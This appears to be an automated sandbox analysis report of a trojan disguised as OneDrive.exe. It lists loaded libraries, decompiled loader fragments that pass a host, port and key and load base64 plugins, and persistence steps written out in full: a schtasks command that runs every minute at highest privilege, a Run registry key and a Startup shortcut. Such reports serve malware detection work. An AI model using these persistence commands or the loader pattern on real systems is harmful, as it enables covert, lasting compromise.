              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: mscoree.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: apphelp.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: kernel.appcore.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: version.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: uxtheme.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: sspicli.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: cryptsp.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: rsaenh.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: cryptbase.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: mscoree.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: kernel.appcore.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: version.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: uxtheme.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: sspicli.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: cryptsp.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: rsaenh.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: cryptbase.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: mscoree.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: kernel.appcore.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: version.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: uxtheme.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: sspicli.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: cryptsp.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: rsaenh.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: cryptbase.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: mscoree.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: kernel.appcore.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: version.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: uxtheme.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: sspicli.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: cryptsp.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: rsaenh.dll
              Source: C:\ProgramData\OneDrive.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\OneDrive.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
              Source: OneDrive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\ProgramData\OneDrive.exe
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: OneDrive.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: OneDrive.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: OneDrive.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: OneDrive.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: OneDrive.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: OneDrive.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              .NET source code contains potential unpacker
              Source: OneDrive.exe, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: OneDrive.exe, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: OneDrive.exe, Messages.cs.Net Code: Memory
              Source: OneDrive.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: OneDrive.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: OneDrive.exe.0.dr, Messages.cs.Net Code: Memory
              Source: C:\Users\user\Desktop\OneDrive.exeCode function: 0_2_00007FF887B106A8 push ebx; retf 0_2_00007FF887B106EA
              Source: C:\Users\user\Desktop\OneDrive.exeCode function: 0_2_00007FF887B105F8 push ebx; retf 0_2_00007FF887B1060A
              Source: C:\Users\user\Desktop\OneDrive.exeCode function: 0_2_00007FF887B105FA push ebx; retf 0_2_00007FF887B1060A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF887A1D2A5 pushad ; iretd 2_2_00007FF887A1D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF887C02316 push 8B485F91h; iretd 2_2_00007FF887C0231B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF8879ED2A5 pushad ; iretd 5_2_00007FF8879ED2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF887B0278B push ebp; iretd 5_2_00007FF887B02862
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF887B00D00 push eax; ret 5_2_00007FF887B00D33
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF887BD2316 push 8B485F94h; iretd 5_2_00007FF887BD231B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF887A1D2A5 pushad ; iretd 10_2_00007FF887A1D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF887B30D25 push eax; ret 10_2_00007FF887B30D33
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF887C02316 push 8B485F91h; iretd 10_2_00007FF887C0231B
              Source: C:\ProgramData\OneDrive.exeCode function: 19_2_00007FF887B006A8 push ebx; retf 19_2_00007FF887B006EA
              Source: C:\ProgramData\OneDrive.exeCode function: 19_2_00007FF887B005FA push ebx; retf 19_2_00007FF887B0060A
              Source: C:\ProgramData\OneDrive.exeCode function: 20_2_00007FF887B006A8 push ebx; retf 20_2_00007FF887B006EA
              Source: C:\ProgramData\OneDrive.exeCode function: 20_2_00007FF887B005FA push ebx; retf 20_2_00007FF887B0060A
              Source: C:\ProgramData\OneDrive.exeCode function: 21_2_00007FF887B006A8 push ebx; retf 21_2_00007FF887B006EA
              Source: C:\ProgramData\OneDrive.exeCode function: 21_2_00007FF887B005FA push ebx; retf 21_2_00007FF887B0060A
              Source: C:\ProgramData\OneDrive.exeCode function: 23_2_00007FF887B305FA push ebx; retf 23_2_00007FF887B3060A
              Source: C:\ProgramData\OneDrive.exeCode function: 23_2_00007FF887B306A8 push ebx; retf 23_2_00007FF887B306EA
              Source: C:\Users\user\Desktop\OneDrive.exeFile created: C:\ProgramData\OneDrive.exeJump to dropped file
              Source: C:\Users\user\Desktop\OneDrive.exeFile created: C:\ProgramData\OneDrive.exeJump to dropped file

              Boot Survival

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedules
              Source: C:\Users\user\Desktop\OneDrive.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\ProgramData\OneDrive.exe"
              Source: C:\Users\user\Desktop\OneDrive.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnkJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnkJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDriveJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDriveJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
